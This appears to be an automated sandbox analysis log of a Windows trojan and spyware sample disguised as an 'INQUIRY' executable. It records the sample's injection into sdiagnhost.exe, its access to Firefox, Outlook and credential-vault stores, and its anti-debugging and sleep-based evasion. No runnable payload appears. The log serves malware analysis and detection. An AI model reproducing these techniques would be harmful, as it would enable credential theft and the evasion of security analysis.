Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 04D45130 appears 58 times
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: String function: 04D7EA12 appears 86 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: String function: 019D5130 appears 56 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: String function: 019E7E54 appears 101 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: String function: 01A1F290 appears 101 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: String function: 0198B970 appears 280 times
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: String function: 01A0EA12 appears 76 times
Source: INQUIRY 02825 AISISAE 9310.exe Static PE information: No import functions for PE file found
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.0000000001732000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000018E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001C31000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdiagnhost.exej% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdiagnhost.exej% vs INQUIRY 02825 AISISAE 9310.exe
Source: INQUIRY 02825 AISISAE 9310.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: INQUIRY 02825 AISISAE 9310.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@3/3
Source: C:\Windows\SysWOW64\sdiagnhost.exe File created: C:\Users\user\AppData\Local\Temp\8m89j3K6
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sdiagnhost.exe, 00000008.00000002.2480736638.000000000313A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: INQUIRY 02825 AISISAE 9310.exe Virustotal: Detection: 53%
Source: INQUIRY 02825 AISISAE 9310.exe ReversingLabs: Detection: 58%
Source: unknown Process created: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe "C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe"
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ukAYQEDLTEztfCfiZyULCNpXudOHrWpiIIabTqQDIYS\gBSE2iEQW.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\sdiagnhost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\sdiagnhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: INQUIRY 02825 AISISAE 9310.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: INQUIRY 02825 AISISAE 9310.exe, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1584878103.000000000160F000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001960000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000002.1694698595.0000000001AFE000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1586739541.00000000017B7000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1697109184.0000000004B1F000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000002.2482536668.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 00000008.00000003.1694734679.0000000004964000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sdiagnhost.pdb source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gBSE2iEQW.exe, 00000007.00000000.1601710606.000000000030F000.00000002.00000001.01000000.00000005.sdmp, gBSE2iEQW.exe, 00000009.00000000.1762176946.000000000030F000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: sdiagnhost.pdbGCTL source: INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1694398153.0000000001524000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 02825 AISISAE 9310.exe, 00000000.00000003.1651763251.000000000151D000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000007.00000003.1621490122.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00066833 push esi; retf 4165h 0_2_0006676E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0005D859 push es; ret 0_2_0005D85A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00052125 pushad ; iretd 0_2_00052136
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00066941 push ss; iretd 0_2_00066954
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00055223 push ebp; iretd 0_2_00055235
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00062AB9 push ebp; iretd 0_2_00062ABA
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00053430 push eax; ret 0_2_00053432
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0005D4BF push ds; ret 0_2_0005D4C5
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0005D505 push esi; iretd 0_2_0005D594
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0005D57B push esi; iretd 0_2_0005D594
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0005D5E2 push esi; iretd 0_2_0005D594
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00068629 push esi; ret 0_2_00068682
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00068691 push esi; ret 0_2_00068682
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_00068699 push esi; ret 0_2_00068682
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0196225F pushad ; ret 0_2_019627F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019627FA pushad ; ret 0_2_019627F9
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019909AD push ecx; mov dword ptr [esp], ecx 0_2_019909B6
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0196283D push eax; iretd 0_2_01962858
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01961368 push eax; iretd 0_2_01961369
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04CD27FA pushad ; ret 8_2_04CD27F9
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04CD225F pushad ; ret 8_2_04CD27F9
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04CD283D push eax; iretd 8_2_04CD2858
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_04D009AD push ecx; mov dword ptr [esp], ecx 8_2_04D009B6
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BB0B90 push FFFFFFA0h; retn 843Ah 8_2_02BB0C6E
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BA5266 push esi; ret 8_2_02BA524F
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BA525E push esi; ret 8_2_02BA524F
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BA51F6 push esi; ret 8_2_02BA524F
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02B9F686 push ebp; iretd 8_2_02B9F687
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BA3400 push esi; retf 4165h 8_2_02BA333B
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BAF540 push edi; iretd 8_2_02BAF610
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02B91DF0 push ebp; iretd 8_2_02B91E02
Source: INQUIRY 02825 AISISAE 9310.exe Static PE information: section name: .text entropy: 7.994690797683423
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\sdiagnhost.exe API/Special instruction interceptor: Address: 7FFCC372DA44
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019D096E rdtsc 0_2_019D096E
Source: C:\Windows\SysWOW64\sdiagnhost.exe Window / User API: threadDelayed 9840
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sdiagnhost.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368 Thread sleep count: 133 > 30
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368 Thread sleep time: -266000s >= -30000s
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368 Thread sleep count: 9840 > 30
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 7368 Thread sleep time: -19680000s >= -30000s
Source: C:\Windows\SysWOW64\sdiagnhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdiagnhost.exe Code function: 8_2_02BACD40 FindFirstFileW,FindNextFileW,FindClose, 8_2_02BACD40
Source: firefox.exe, 0000000C.00000002.1985529847.000001B88B2FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: sdiagnhost.exe, 00000008.00000002.2480736638.0000000003077000.00000004.00000020.00020000.00000000.sdmp, gBSE2iEQW.exe, 00000009.00000002.2481949457.0000000001339000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\sdiagnhost.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_000680B3 LdrLoadDll, 0_2_000680B3
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0198A197 mov eax, dword ptr fs:[00000030h] 0_2_0198A197
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A4A250 mov eax, dword ptr fs:[00000030h] 0_2_01A4A250
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01994260 mov eax, dword ptr fs:[00000030h] 0_2_01994260
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01994260 mov eax, dword ptr fs:[00000030h] 0_2_01994260
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01994260 mov eax, dword ptr fs:[00000030h] 0_2_01994260
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A6625D mov eax, dword ptr fs:[00000030h] 0_2_01A6625D
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE59C mov eax, dword ptr fs:[00000030h] 0_2_019CE59C
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A105A7 mov eax, dword ptr fs:[00000030h] 0_2_01A105A7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A105A7 mov eax, dword ptr fs:[00000030h] 0_2_01A105A7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A105A7 mov eax, dword ptr fs:[00000030h] 0_2_01A105A7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C4588 mov eax, dword ptr fs:[00000030h] 0_2_019C4588
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01992582 mov eax, dword ptr fs:[00000030h] 0_2_01992582
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01992582 mov ecx, dword ptr fs:[00000030h] 0_2_01992582
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019B45B1 mov eax, dword ptr fs:[00000030h] 0_2_019B45B1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019B45B1 mov eax, dword ptr fs:[00000030h] 0_2_019B45B1
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019965D0 mov eax, dword ptr fs:[00000030h] 0_2_019965D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CA5D0 mov eax, dword ptr fs:[00000030h] 0_2_019CA5D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CA5D0 mov eax, dword ptr fs:[00000030h] 0_2_019CA5D0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE5CF mov eax, dword ptr fs:[00000030h] 0_2_019CE5CF
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CE5CF mov eax, dword ptr fs:[00000030h] 0_2_019CE5CF
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CC5ED mov eax, dword ptr fs:[00000030h] 0_2_019CC5ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CC5ED mov eax, dword ptr fs:[00000030h] 0_2_019CC5ED
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019925E0 mov eax, dword ptr fs:[00000030h] 0_2_019925E0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE5E7 mov eax, dword ptr fs:[00000030h] 0_2_019BE5E7
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A26500 mov eax, dword ptr fs:[00000030h] 0_2_01A26500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h] 0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h] 0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h] 0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h] 0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019BE53E mov eax, dword ptr fs:[00000030h] 0_2_019BE53E
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h] 0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h] 0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h] 0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h] 0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h] 0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h] 0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A64500 mov eax, dword ptr fs:[00000030h] 0_2_01A64500
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h] 0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h] 0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h] 0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h] 0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h] 0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019A0535 mov eax, dword ptr fs:[00000030h] 0_2_019A0535
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01998550 mov eax, dword ptr fs:[00000030h] 0_2_01998550
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01998550 mov eax, dword ptr fs:[00000030h] 0_2_01998550
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C656A mov eax, dword ptr fs:[00000030h] 0_2_019C656A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C656A mov eax, dword ptr fs:[00000030h] 0_2_019C656A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C656A mov eax, dword ptr fs:[00000030h] 0_2_019C656A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A1A4B0 mov eax, dword ptr fs:[00000030h] 0_2_01A1A4B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C44B0 mov ecx, dword ptr fs:[00000030h] 0_2_019C44B0
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019964AB mov eax, dword ptr fs:[00000030h] 0_2_019964AB
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A4A49A mov eax, dword ptr fs:[00000030h] 0_2_01A4A49A
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019904E5 mov ecx, dword ptr fs:[00000030h] 0_2_019904E5
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h] 0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h] 0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h] 0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h] 0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h] 0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h] 0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_01A16420 mov eax, dword ptr fs:[00000030h] 0_2_01A16420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C8402 mov eax, dword ptr fs:[00000030h] 0_2_019C8402
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C8402 mov eax, dword ptr fs:[00000030h] 0_2_019C8402
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019C8402 mov eax, dword ptr fs:[00000030h] 0_2_019C8402
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_019CA430 mov eax, dword ptr fs:[00000030h] 0_2_019CA430
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0198E420 mov eax, dword ptr fs:[00000030h] 0_2_0198E420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0198E420 mov eax, dword ptr fs:[00000030h] 0_2_0198E420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0198E420 mov eax, dword ptr fs:[00000030h] 0_2_0198E420
Source: C:\Users\user\Desktop\INQUIRY 02825 AISISAE 9310.exe Code function: 0_2_0198C427 mov eax, dword ptr fs:[00000030h] 0_2_0198C427
